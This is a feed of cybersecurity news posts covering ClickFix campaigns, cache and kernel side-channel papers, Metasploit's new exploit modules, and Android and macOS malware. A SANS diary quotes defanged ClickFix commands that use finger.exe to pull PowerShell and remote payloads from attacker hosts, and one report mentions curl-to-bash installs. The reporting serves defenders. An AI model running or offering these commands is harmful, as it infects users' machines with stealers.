Normal view

Received today — 14 December 2025Cybersecurity

Why are companies free to choose their own AI-driven security solutions?

13 December 2025 at 17:00

What Makes AI-Driven Security Solutions Crucial in Modern Cloud Environments? How can organizations navigate the complexities of cybersecurity to ensure robust protection, particularly when dealing with Non-Human Identities (NHIs) in cloud environments? The answer lies in leveraging AI-driven security solutions, offering remarkable freedom of choice and adaptability for cybersecurity professionals. Understanding Non-Human Identities: The Backbone […]

The post Why are companies free to choose their own AI-driven security solutions? appeared first on Entro.

The post Why are companies free to choose their own AI-driven security solutions? appeared first on Security Boulevard.

Can Agentic AI provide solutions that make stakeholders feel assured?

13 December 2025 at 17:00

How Are Non-Human Identities Transforming Cybersecurity Practices? Are you aware of the increasing importance of Non-Human Identities (NHIs)? Where organizations transition towards more automated and cloud-based environments, managing NHIs and secrets security becomes vital. These machine identities serve as the backbone for securing sensitive operations across industries like financial services, healthcare, and DevOps environments. Understanding […]

The post Can Agentic AI provide solutions that make stakeholders feel assured? appeared first on Entro.

The post Can Agentic AI provide solutions that make stakeholders feel assured? appeared first on Security Boulevard.

How are secrets scanning technologies getting better?

13 December 2025 at 17:00

How Can Organizations Enhance Their Cloud Security Through Non-Human Identities? Have you ever wondered about the unseen challenges within your cybersecurity framework? Managing Non-Human Identities (NHIs) and their associated secrets has emerged as a vital component in establishing a robust security posture. For organizations operating in the cloud, neglecting to secure machine identities can result […]

The post How are secrets scanning technologies getting better? appeared first on Entro.

The post How are secrets scanning technologies getting better? appeared first on Security Boulevard.

How does NHI support the implementation of least privilege?

13 December 2025 at 17:00

What Are Non-Human Identities and Why Are They Essential for Cybersecurity? Have you ever pondered the complexity of cybersecurity beyond human interactions? Non-Human Identities (NHIs) are becoming a cornerstone in securing digital environments. With the guardians of machine identities, NHIs are pivotal in addressing the security gaps prevalent between research and development teams and security […]

The post How does NHI support the implementation of least privilege? appeared first on Entro.

The post How does NHI support the implementation of least privilege? appeared first on Security Boulevard.

What New Changes Are Coming to FedRAMP in 2026?

12 December 2025 at 17:40

One thing is certain: every year, the cybersecurity threat environment will evolve. AI tools, advances in computing, the growth of high-powered data centers that can be weaponized, compromised IoT networks, and all of the traditional vectors grow and change. As such, the tools and frameworks we use to resist these attacks will also need to […]

The post What New Changes Are Coming to FedRAMP in 2026? appeared first on Security Boulevard.

Received yesterday — 13 December 2025Cybersecurity

ClickFix Attacks Still Using the Finger, (Sat, Dec 13th)

13 December 2025 at 14:35

Introduction

Since as early as November 2025, the finger protocol has been used in ClickFix social engineering attacks. BleepingComputer posted a report of this activity on November 15th, and Didier Stevens posted a short follow-up in an ISC diary the next day.

I often investigate two campaigns that employ ClickFix attacks: KongTuke and SmartApeSG. When I checked earlier this week on Thursday, December 11th, both campaigns used commands that ran finger.exe in Windows to retrieve malicious content.

So after nearly a month, ClickFix attacks are still giving us the finger.


Shown above: ClickFix attacks running finger.exe.

KongTuke Example

My investigation of KongTuke activity on December 11th revealed a command for finger gcaptcha@captchaver[.]top from the fake CAPTCHA page.


Shown above: Example of fake CAPTCHA page from the KongTuke campaign on December 11th, 2025.

I recorded network traffic generated by running this ClickFix script, and I used the finger filter in Wireshark to find finger traffic over TCP port 79.


Shown above: Finding finger traffic using the finger filter in Wireshark.

Following the TCP stream of this traffic revealed text returned from the server. The result was a powershell command with Base64 encoded text.


Shown above: Text returned from the server in response to the finger command.

SmartApeSG Example

My investigation of SmartApeSG activity on December 11th revealed a command for finger Galo@91.193.19[.]108 from the fake CAPTCHA page.


Shown above: Example of fake CAPTCHA page from the SmartApeSG campaign on December 11th, 2025.

I recorded network traffic generated by running this ClickFix script, and I used the finger filter in Wireshark to find finger traffic over TCP port 79.


Shown above: Finding finger traffic using the finger filter in Wireshark.

Following the TCP stream of this traffic revealed text returned from the server. The result was a script to retrieve content from pmidpils[.]com/yhb.jpg then save and run that content on the user's Windows host.


Shown above: Text returned from the server in response to the finger command.

Final Words

As Didier Stevens noted in last month's diary about this activity, corporate environments with an explicit proxy will block TCP port 79 traffic generated by finger.exe. However, if TCP port 79 traffic isn't blocked, these attacks could still be effective.

Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

NDSS 2025 – A Systematic Evaluation Of Novel And Existing Cache Side Channels

13 December 2025 at 11:00

Session 5D: Side Channels 1

Authors, Creators & Presenters: Fabian Rauscher (Graz University of Technology), Carina Fiedler (Graz University of Technology), Andreas Kogler (Graz University of Technology), Daniel Gruss (Graz University of Technology)

PAPER
A Systematic Evaluation Of Novel And Existing Cache Side Channels

CPU caches are among the most widely studied side-channel targets, with Prime+Probe and Flush+Reload being the most prominent techniques. These generic cache attack techniques can leak cryptographic keys, user input, and are a building block of many microarchitectural attacks. In this paper, we present the first systematic evaluation using 9 characteristics of the 4 most relevant cache attacks, Flush+Reload, Flush+Flush, Evict+Reload, and Prime+Probe, as well as three new attacks that we introduce: Demote+Reload, Demote+Demote, and DemoteContention. We evaluate hit-miss margins, temporal precision, spatial precision, topological scope, attack time, blind spot length, channel capacity, noise resilience, and detectability on recent Intel microarchitectures. Demote+Reload and Demote+Demote perform similar to previous attacks and slightly better in some cases, e.g., Demote+Reload has a 60.7 % smaller blind spot than Flush+Reload. With 15.48 Mbit/s, Demote+Reload has a 64.3 % higher channel capacity than Flush+Reload. We also compare all attacks in an AES T-table attack and compare Demote+Reload and Flush+Reload in an inter-keystroke timing attack. Beyond the scope of the prior attack techniques, we demonstrate a KASLR break with Demote+Demote and the amplification of power side-channel leakage with Demote+Reload. Finally, Sapphire Rapids and Emerald Rapids CPUs use a non-inclusive L3 cache, effectively limiting eviction-based cross-core attacks, e.g., Prime+Probe and Evict+Reload, to rare cases where the victim's activity reaches the L3 cache. Hence, we show that in a cross-core attack, DemoteContention can be used as a reliable alternative to Prime+Probe and Evict+Reload that does not require reverse-engineering of addressing functions and cache replacement policy.


ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.


Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.

Permalink

The post NDSS 2025 – A Systematic Evaluation Of Novel And Existing Cache Side Channels appeared first on Security Boulevard.

How do secrets rotations drive innovations in security?

12 December 2025 at 17:00

How Critical is Managing Non-Human Identities for Cloud Security? Are you familiar with the virtual tourists navigating your digital right now? These tourists, known as Non-Human Identities (NHIs), are machine identities pivotal in computer security, especially within cloud environments. These NHIs are akin to digital travelers carrying passports and visas—where the passport represents an encrypted […]

The post How do secrets rotations drive innovations in security? appeared first on Entro.

The post How do secrets rotations drive innovations in security? appeared first on Security Boulevard.

How can effective NHIs fit your cybersecurity budget?

12 December 2025 at 17:00

Are Non-Human Identities Key to an Optimal Cybersecurity Budget? Have you ever pondered over the hidden costs of cybersecurity that might be draining your resources without your knowledge? Non-Human Identities (NHIs) and Secrets Security Management are essential components of a cost-effective cybersecurity strategy, especially when organizations increasingly operate in cloud environments. Understanding Non-Human Identities (NHIs) […]

The post How can effective NHIs fit your cybersecurity budget? appeared first on Entro.

The post How can effective NHIs fit your cybersecurity budget? appeared first on Security Boulevard.

What aspects of Agentic AI security should get you excited?

12 December 2025 at 17:00

Are Non-Human Identities the Key to Strengthening Agentic AI Security? Where increasingly dominated by Agentic AI, organizations are pivoting toward more advanced security paradigms to protect their digital. Non-Human Identities (NHI) and Secrets Security Management have emerged with pivotal elements to fortify this quest for heightened cybersecurity. But why should this trend be generating excitement […]

The post What aspects of Agentic AI security should get you excited? appeared first on Entro.

The post What aspects of Agentic AI security should get you excited? appeared first on Security Boulevard.

What are the best practices for ensuring NHIs are protected?

12 December 2025 at 17:00

How Can Organizations Safeguard Non-Human Identities in the Cloud? Are your organization’s machine identities as secure as they should be? With digital evolves, the protection of Non-Human Identities (NHIs) becomes crucial for maintaining robust cybersecurity postures. NHIs represent machine identities like encrypted passwords, tokens, and keys, which are pivotal in ensuring effective cloud security control. […]

The post What are the best practices for ensuring NHIs are protected? appeared first on Entro.

The post What are the best practices for ensuring NHIs are protected? appeared first on Security Boulevard.

CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks

13 December 2025 at 07:33
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file upload vulnerability that could be exploited to achieve remote code

Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild

13 December 2025 at 00:32
Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched by Google in Chrome earlier this week. The vulnerabilities are listed below - CVE-2025-43529 (CVSS score: N/A) - A use-after-free vulnerability in WebKit

Metasploit Wrap-Up 12/12/2025

12 December 2025 at 15:38

React2shell Module

As you may have heard, on December 3, 2025, the React team announced a critical Remote Code Execution (RCE) vulnerability in servers using the React Server Components (RSC) Flight protocol. The vulnerability, tracked as CVE-2025-55182, carries a CVSS score of 10.0 and is informally known as "React2Shell". It allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with "proto", "constructor", or "prototype" as module names. We're happy to announce that community contributor vognik submitted an exploit module for React2Shell which landed earlier this week and is included in this week's release.

MSSQL Improvements

Over the past couple of weeks Metasploit has made a couple of key improvements to the framework’s MSSQL attack capabilities. The first (PR 20637) is a new NTLM relay module, auxiliary/server/relay/smb_to_mssql, which enables users to start a malicious SMB server that will relay authentication attempts to one or more target MSSQL servers. When successful, the Metasploit operator will have an interactive session to the MSSQL server that can be used to run interactive queries, or MSSQL auxiliary modules.

Building on this work, it became clear that users would need to interact with MSSQL servers that required encryption as many do in hardened environments. To achieve that objective, issue 18745 was closed by updating Metasploits MSSQL protocol library to offer better encryption support. Now, Metasploit users can open interactive sessions to servers that offer and even require encrypted connections. This functionality is available automatically in the auxiliary/scanner/mssql/mssql_login and new auxiliary/server/relay/smb_to_mssql modules.

New module content (5)

Magento SessionReaper

Authors: Blaklis, Tomais Williamson, and Valentin Lobstein chocapikk@leakix.net 

Type: Exploit

Pull request: #20725 contributed by Chocapikk 

Path:multi/http/magento_sessionreaper

AttackerKB reference: CVE-2025-54236

Description: This adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint.

Unauthenticated RCE in React and Next.js

Authors: Lachlan Davidson, Maksim Rogov, and maple3142

Type: Exploit

Pull request: #20760 contributed by sfewer-r7 

Path: multi/http/react2shell_unauth_rce_cve_2025_55182 

AttackerKB reference: CVE-2025-66478

Description: This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.

WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE

Authors: Peter Thaleikis and Valentin Lobstein chocapikk@leakix.net 

Type: Exploit

Pull request: #20746 contributed by Chocapikk 

Path: multi/http/wp_king_addons_privilege_escalation 

AttackerKB reference: CVE-2025-8489

Description: This adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload.

Linux Reboot

Author: bcoles bcoles@gmail.com 

Type: Payload (Single)

Pull request: #20682 contributed by bcoles 

Path:linux/loongarch64/reboot

Description: This extends our payloads support to a new architecture, LoongArch64. The first payload introduced for this new architecture is the reboot payload, which will cause the target system to restart once triggered.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

Enhancements and features (1)

  • #20704 from dwelch-r7 - The module auxiliary/scanner/ssh/ssh_login_pubkey has been removed. Its functionality has been moved into auxiliary/scanner/ssh/ssh_login.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Received before yesterdayCybersecurity

Friday Squid Blogging: Giant Squid Eating a Diamondback Squid

12 December 2025 at 17:00

I have no context for this video—it’s from Reddit—but one of the commenters adds some context:

Hey everyone, squid biologist here! Wanted to add some stuff you might find interesting.

With so many people carrying around cameras, we’re getting more videos of giant squid at the surface than in previous decades. We’re also starting to notice a pattern, that around this time of year (peaking in January) we see a bunch of giant squid around Japan. We don’t know why this is happening. Maybe they gather around there to mate or something? who knows! but since so many people have cameras, those one-off monster-story encounters are now caught on video, like this one (which, btw, rips. This squid looks so healthy, it’s awesome)...

The post Friday Squid Blogging: Giant Squid Eating a Diamondback Squid appeared first on Security Boulevard.

Friday Squid Blogging: Giant Squid Eating a Diamondback Squid

12 December 2025 at 17:00

I have no context for this video—it’s from Reddit—but one of the commenters adds some context:

Hey everyone, squid biologist here! Wanted to add some stuff you might find interesting.

With so many people carrying around cameras, we’re getting more videos of giant squid at the surface than in previous decades. We’re also starting to notice a pattern, that around this time of year (peaking in January) we see a bunch of giant squid around Japan. We don’t know why this is happening. Maybe they gather around there to mate or something? who knows! but since so many people have cameras, those one-off monster-story encounters are now caught on video, like this one (which, btw, rips. This squid looks so healthy, it’s awesome).

When we see big (giant or colossal) healthy squid like this, it’s often because a fisher caught something else (either another squid or sometimes an antarctic toothfish). The squid is attracted to whatever was caught and they hop on the hook and go along for the ride when the target species is reeled in. There are a few colossal squid sightings similar to this from the southern ocean (but fewer people are down there, so fewer cameras, fewer videos). On the original instagram video, a bunch of people are like “Put it back! Release him!” etc, but he’s just enjoying dinner (obviously as the squid swims away at the end).

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

NDSS 2025 – KernelSnitch: Side Channel-Attacks On Kernel Data Structures

12 December 2025 at 15:00

Session 5D: Side Channels 1

Authors, Creators & Presenters: Lukas Maar (Graz University of Technology), Jonas Juffinger (Graz University of Technology), Thomas Steinbauer (Graz University of Technology), Daniel Gruss (Graz University of Technology), Stefan Mangard (Graz University of Technology)

PAPER
KernelSnitch: Side Channel-Attacks On Kernel Data Structures

The sharing of hardware elements, such as caches, is known to introduce microarchitectural side-channel leakage. One approach to eliminate this leakage is to not share hardware elements across security domains. However, even under the assumption of leakage-free hardware, it is unclear whether other critical system components, like the operating system, introduce software-caused side-channel leakage. In this paper, we present a novel generic software side-channel attack, KernelSnitch, targeting kernel data structures such as hash tables and trees. These structures are commonly used to store both kernel and user information, e.g., metadata for userspace locks. KernelSnitch exploits that these data structures are variable in size, ranging from an empty state to a theoretically arbitrary amount of elements. Accessing these structures requires a variable amount of time depending on the number of elements, i.e., the occupancy level. This variance constitutes a timing side channel, observable from user space by an unprivileged, isolated attacker. While the timing differences are very low compared to the syscall runtime, we demonstrate and evaluate methods to amplify these timing differences reliably. In three case studies, we show that KernelSnitch allows unprivileged and isolated attackers to leak sensitive information from the kernel and activities in other processes. First, we demonstrate covert channels with transmission rates up to 580 kbit/s. Second, we perform a kernel heap pointer leak in less than 65 s by exploiting the specific indexing that Linux is using in hash tables. Third, we demonstrate a website fingerprinting attack, achieving an F1 score of more than 89 %, showing that activity in other user programs can be observed using KernelSnitch. Finally, we discuss mitigations for our hardware-agnostic attacks.


ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.


Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.

Permalink

The post NDSS 2025 – KernelSnitch: Side Channel-Attacks On Kernel Data Structures appeared first on Security Boulevard.

LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle

12 December 2025 at 14:06

Regulators made their move in 2025.

Disclosure deadlines arrived. AI rules took shape. Liability rose up the chain of command. But for security teams on the ground, the distance between policy and practice only grew wider.

Part two of a (more…)

The post LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle first appeared on The Last Watchdog.

The post LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle appeared first on Security Boulevard.

Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads

12 December 2025 at 13:50
Cybersecurity researchers are calling attention to a new campaign that's leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. "These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing

New Android Malware Locks Device Screens and Demands a Ransom

12 December 2025 at 15:15

Android malware DroidLock

A new Android malware locks device screens and demands that users pay a ransom to keep their data from being deleted. Dubbed “DroidLock” by Zimperium researchers, the Android ransomware-like malware can also “wipe devices, change PINs, intercept OTPs, and remotely control the user interface, turning an infected phone into a hostile endpoint.” The malware detected by the researchers targeted Spanish Android users via phishing sites. Based on the examples provided, the French telecommunications company Orange S.A. was one of the companies impersonated in the campaign.

Android Malware DroidLock Uses ‘Ransomware-like Overlay’

The researchers detailed the new Android malware in a blog post this week, noting that the malware “has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device.” The malware uses fake system update screens to trick victims and can stream and remotely control devices via virtual network computing (VNC). The malware can also exploit device administrator privileges to “lock or erase data, capture the victim's image with the front camera, and silence the device.” The infection chain starts with a dropper that appears to require the user to change settings to allow unknown apps to be installed from the source (image below), which leads to the secondary payload that contains the malware. [caption id="attachment_107722" align="aligncenter" width="300"]Android malware DroidLock The Android malware DroidLock prompts users for installation permissions (Zimperium)[/caption] Once the user grants accessibility permission, “the malware automatically approves additional permissions, such as those for accessing SMS, call logs, contacts, and audio,” the researchers said. The malware requests Device Admin Permission and Accessibility Services Permission at the start of the installation. Those permissions allow the malware to perform malicious actions such as:
  • Wiping data from the device, “effectively performing a factory reset.”
  • Locking the device.
  • Changing the PIN, password or biometric information to prevent user access to the device.
Based on commands received from the threat actor’s command and control (C2) server, “the attacker can compromise the device indefinitely and lock the user out from accessing the device.”

DroidLock Malware Overlays

The DroidLock malware uses Accessibility Services to launch overlays on targeted applications, prompted by an AccessibilityEvent originating from a package on the attacker's target list. The Android malware uses two primary overlay methods:
  • A Lock Pattern overlay that displays a pattern-drawing user interface (UI) to capture device unlock patterns.
  • A WebView overlay that loads attacker-controlled HTML content stored locally in a database; when an application is opened, the malware queries the database for the specific package name, and if a match is found it launches a full-screen WebView overlay that displays the stored HTML.
The malware also uses a deceptive Android update screen that instructs users not to power off or restart their devices. “This technique is commonly used by attackers to prevent user interaction while malicious activities are carried out in the background,” the researchers said. The malware can also capture all screen activity and transmit it to a remote server by operating as a persistent foreground service and using MediaProjection and VirtualDisplay to capture screen images, which are then converted to a base64-encoded JPEG format and transmitted to the C2 server. “This highly dangerous functionality could facilitate the theft of any sensitive information shown on the device’s display, including credentials, MFA codes, etc.,” the researchers said. Zimperium has shared its findings with Google, so up-to-date Android devices are protected against the malware, and the company has also published DroidLock Indicators of Compromise (IoCs).

What Tech Leaders Need to Know About MCP Authentication in 2025

MCP is transforming AI agent connectivity, but authentication is the critical gap. Learn about Shadow IT risks, enterprise requirements, and solutions.

The post What Tech Leaders Need to Know About MCP Authentication in 2025 appeared first on Security Boulevard.

Building Trustworthy AI Agents

12 December 2025 at 07:00

The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us with doubt about things we are or that we know, and being unable to distinguish between who we are and who we have been. They struggle with incomplete, inaccurate, and partial context: with no standard way to move toward accuracy, no mechanism to correct sources of error, and no accountability when wrong information leads to bad decisions...

The post Building Trustworthy AI Agents appeared first on Security Boulevard.

The US digital doxxing of H-1B applicants is a massive privacy misstep

12 December 2025 at 13:19

Technology professionals hoping to come and work in the US face a new privacy concern. Starting December 15, skilled workers on H-1B visas and their families must flip their social media profiles to public before their consular interviews. It’s a deeply risky move from a security and privacy perspective.

According to a missive from the US State Department, immigration officers use all available information to vet newcomers for signs that they pose a threat to national security. That includes an “online presence review.” That review now requires not just H-1B applicants but also H-4 applicants (their dependents who want to move with them to the US) to “adjust the privacy settings on all of their social media profiles to ‘public.'”

An internal State Department cable obtained by CBS had sharper language: it instructs officers to screen for “any indications of hostility toward the citizens, culture, government, institutions, or founding principles of the United States.” What that means is unclear, but if your friends like posting strong political opinions, you should be worried.

This isn’t the first time that the government has forced people to lift the curtain on their private digital lives. The US State Department forced student visa applicants to make their social media profiles public in June this year.

This is a big deal for a lot of people. The H-1B program allows companies to temporarily hire foreign workers in specialty jobs. The US processed around 400,000 visas under the H-1B program last year, most of which were applications to renew employment, according to the Pew Research Center. When you factor in those workers’ dependents, we’re talking well over a million people. This decision forces them into long-term digital exposure that threatens not just them, but the US too.

Why forced public exposure is a security disaster

A lot of these H-1B workers work for defense contractors, chip makers, AI labs, and big tech companies. These are organizations that foreign powers (especially those hostile to the US) care a lot about, and that makes those H-1B employees primary targets for them.

Making H-1B holders’ real names, faces, and daily routines public is a form of digital doxxing. The policy exposes far more personal information than is safe, creating significant new risks.

This information gives these actors a free organizational chart, complete with up-to-date information on who’s likely to be working on chip designs and sensitive software.

It also gives the same people all they need to target people on that chart. They have information on H-1B holders and their dependents, including intelligence about their friends and family, their interests, their regular locations, and even what kinds of technology they use. They become more exposed to risks like SIM swapping and swatting.

This public information also turns employees into organizational attack vectors. Adversaries can use personal and professional data to enhance spear-phishing and business email compromise techniques that cost organizations dearly. Public social media content becomes training data for fraud, serving up audio and video that threat actors can use to create lifelike impersonations of company employees.

Social media profiles also give adversaries an ideal way to approach people. They have a nasty habit of exploiting social media to target assets for recruitment. The head of MI5 warned two years ago that Chinese state actors had approached an estimated 20,000 Britons via LinkedIn to steal industrial or technological secrets.

Armed with a deep, intimate understanding of what makes their targets tick, attackers stand a much better chance of co-opting them. One person might need money because of a gambling problem or a sick relative. Another might be lonely and a perfect target for a romance scam.

Or how about basic extortion? LGBTQ+ individuals from countries where homosexuality is criminalized risk exposure to regimes that could harm them when they return. Family in hostile countries become bargaining chips. In some regions, families of high-value employees could face increased exposure if this information becomes accessible. Foreign nation states are good at exploiting pain points. This policy means that they won’t have to look far for them.

Visa applications might assume they can simply make an account private again once officials have evaluated them. But adversary states to the US are actively seeking such information. They have vast online surveillance operations that scrape public social media accounts. As soon as they notice someone showing up in the US with H-1B visa status, they’ll be ready to mine account data that they’ve already scraped.

So what is an H-1B applicant to do? Deleting accounts is a bad idea, because sudden disappearance can trigger suspicion and officers may detect forensic traces. A safer approach is to pause new posting and carefully review older content before making profiles public. Removing or hiding posts that reveal personal routines, locations, or sensitive opinions reduces what can be taken out of context or used for targeting once accounts are exposed.

The irony is that spies are likely using fake social media accounts honed for years to slip under the radar. That means they’ll keep operating in the dark while legitimate H-1B applicants are the ones who become vulnerable. So this policy may unintentionally create the very risks it aims to prevent. And it also normalizes mandatory public exposure as a condition of government interaction.

We’re at a crossroads. Today, visa applicants, their families, and their employers are at risk. The infrastructure exists to expand this approach in the future. Or officials could stop now and rethink, before these risks become more deeply entrenched.


We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

EFF and 12 Organizations Urge UK Politicians to Drop Digital ID Scheme Ahead of Parliamentary Petition Debate

13 December 2025 at 06:10

The UK Parliament convened earlier this week to debate a petition signed by 2.9 million people calling for an end to the government’s plans to roll out a national digital ID. Ahead of that debate, EFF and 12 other civil society organizations wrote to politicians in the country urging MPs to reject the Labour government’s newly announced digital ID proposal.

The UK’s Prime Minister Keir Starmer pitched the scheme as a way to “cut the faff” in proving people’s identities by creating a virtual ID on personal devices with information like names, date of birth, nationality, photo, and residency status to verify their right to live and work in the country. 

But the case for digital identification has not been made. 

As we detail in our joint briefing, the proposal follows a troubling global trend: governments introducing expansive digital identity systems that are structurally incompatible with a rights-respecting democracy. The UK’s plan raises six interconnected concerns:

  1. Mission creep
  2. Infringements on privacy rights
  3. Serious security risks
  4. Reliance on inaccurate and unproven technologies
  5. Discrimination and exclusion
  6. The deepening of entrenched power imbalances between the state and the public.

Digital ID schemes don’t simply verify who you are—they redefine who can access services and what those services look like. They become a gatekeeper to essential societal infrastructure, enabling governments and state agencies to close doors as easily as they open them. And they disproportionately harm those already at society’s margins, including people seeking asylum and undocumented communities, who already face heightened surveillance and risk.

Even the strongest recommended safeguards cannot resolve the core problem: a mandatory digital ID scheme that shifts power dramatically away from individuals and toward the state. No one should be coerced—technically or socially—into a digital system in order to participate fully in public life. And at a time when almost 3 million people in the UK have called on politicians to reject this proposal, the government must listen to people and say no to digital ID.

Read our civil society briefing in full here.

New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale

12 December 2025 at 09:04
Cybersecurity researchers have documented four new phishing kits named BlackForce, GhostFrame, InboxPrime AI, and Spiderman that are capable of facilitating credential theft at scale. BlackForce, first detected in August 2025, is designed to steal credentials and perform Man-in-the-Browser (MitB) attacks to capture one-time passwords (OTPs) and bypass multi-factor authentication (MFA). The kit

3 Compliance Processes to Automate in 2026

12 December 2025 at 07:00

For years, compliance has been one of the most resource-intensive responsibilities for cybersecurity teams. Despite growing investments in tools, the day-to-day reality of compliance is still dominated by manual, duplicative tasks. Teams chase down screenshots, review spreadsheets, and cross-check logs, often spending weeks gathering information before an assessment or audit.

The post 3 Compliance Processes to Automate in 2026 appeared first on Security Boulevard.

Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer

12 December 2025 at 09:26

Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide that, in reality, installs malware. ChatGPT’s sharing feature creates a public link to a conversation that lives in the owner’s account. Attackers can curate their conversations to create a short, clean conversation which they can share.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

sponsored ad for ChatGPT Atlas which looks very real
Image courtesy of Kaspersky

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

  • First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware, that we recommend skipping them or make sure you never see them. At best they cost the company you looked for money and at worst you fall prey to imposters.
  • If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.
  • Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.

